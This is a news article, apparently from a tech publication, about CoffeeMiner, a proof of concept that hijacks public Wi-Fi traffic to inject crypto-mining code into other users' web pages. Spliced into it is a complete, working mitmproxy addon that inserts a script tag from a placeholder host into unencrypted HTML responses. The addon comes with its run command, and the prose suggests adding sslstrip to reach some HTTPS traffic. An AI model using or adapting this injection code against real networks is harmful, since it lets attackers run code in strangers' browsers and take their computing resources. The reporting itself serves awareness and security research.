Thanks to the ridiculous valuation of Bitcoin and other cryptocurrencies, cryptomining code has become a common mechanism for converting authorized and stolen computing cycles into potential cash.
For those interested in violating computer laws – please, don’t – and those interested in computer security research projects, a developer named Arnau, based in Spain, has published a proof-of-concept walkthrough for hacking public Wi-Fi networks to inject crypto-mining code in connected browsing sessions.
CoffeeMiner is a project that allows the sort of man-in-the-middle attack that has been used by cyber thieves in Starbucks cafes and doubtless elsewhere.
The CoffeeMiner script spoofs Address Resolution Protocol (ARP) replies on the local network so that other devices send their traffic through the attacker's machine, where anything not protected by TLS can be read and modified.
It then runs mitmproxy as the man-in-the-middle and injects a single line of HTML, a script tag that pulls in the miner, into non-HTTPS (that is, unencrypted) webpages requested by other users on the network:
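What that injection step looks like in practice, as an added example written for this article rather than code taken from CoffeeMiner: a mitmproxy addon that only touches plaintext HTTP responses whose Content-Type is text/html, inserts the tag before the closing body tag (or appends it if there is none), and never injects twice. The script URL is a placeholder chosen for illustration, not the project's real miner endpoint; the ARP spoofing that steers traffic to the proxy is a separate step this file does not perform. The two helpers are pure functions so they can be exercised without mitmproxy installed.

```python
"""
Added example, not CoffeeMiner's own code: a mitmproxy addon that injects a
<script> tag into unencrypted HTML responses, as the article describes.

Run as:   mitmproxy --mode transparent -s inject_example.py
(after redirecting the victims' traffic to this host, which this file does not do).
"""
import re
from typing import Optional

# Assumption: a placeholder URL for illustration only; the real project points
# the tag at an in-browser miner.
INJECTED_TAG = b'<script src="http://example.invalid/miner.js"></script>'

# Match the closing body tag regardless of case or stray whitespace.
_BODY_CLOSE = re.compile(rb"</body\s*>", re.IGNORECASE)


def should_inject(scheme: str, content_type: Optional[str]) -> bool:
    """Only plaintext HTTP responses that carry HTML are candidates.

    HTTPS is left alone: without a certificate the victim trusts, a transparent
    proxy cannot read or alter those responses, which is the limitation the
    article notes. Non-HTML bodies (images, JSON, JavaScript) would simply be
    corrupted by a stray tag, so they are skipped too.
    """
    if scheme != "http":
        return False
    if not content_type:
        return False
    mime = content_type.split(";", 1)[0].strip().lower()
    return mime == "text/html"


def inject(body: bytes) -> bytes:
    """Insert INJECTED_TAG before </body>, or append it if the page has none."""
    if INJECTED_TAG in body:          # idempotent: retries must not double-inject
        return body
    match = _BODY_CLOSE.search(body)
    if match is None:
        return body + INJECTED_TAG
    return body[:match.start()] + INJECTED_TAG + body[match.start():]


def response(flow) -> None:
    """mitmproxy 'response' hook: called once per completed HTTP response."""
    resp = flow.response
    if resp is None:
        return
    if not should_inject(flow.request.scheme, resp.headers.get("content-type")):
        return
    # resp.content is the body with any Content-Encoding (gzip, br) already
    # undone; assigning to it re-encodes and fixes up Content-Length for us.
    resp.content = inject(resp.content)
```

Browsers fetch the injected script with the page's own origin as referrer and run it with the page's privileges, which is why a single tag in a plaintext page is enough: the mining happens in the victim's tab for as long as it stays open.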
As Arnau explained, the attack – demonstrated on a VirtualBox setup rather than in the wild – can be automated. The published version does nothing with requests for HTTPS webpages; bolting on sslstrip could downgrade some of those connections to plain HTTP, though sites that enforce HSTS, or that the browser has on its preload list, would stay out of reach.
The code, mostly Python, is available on GitHub. ®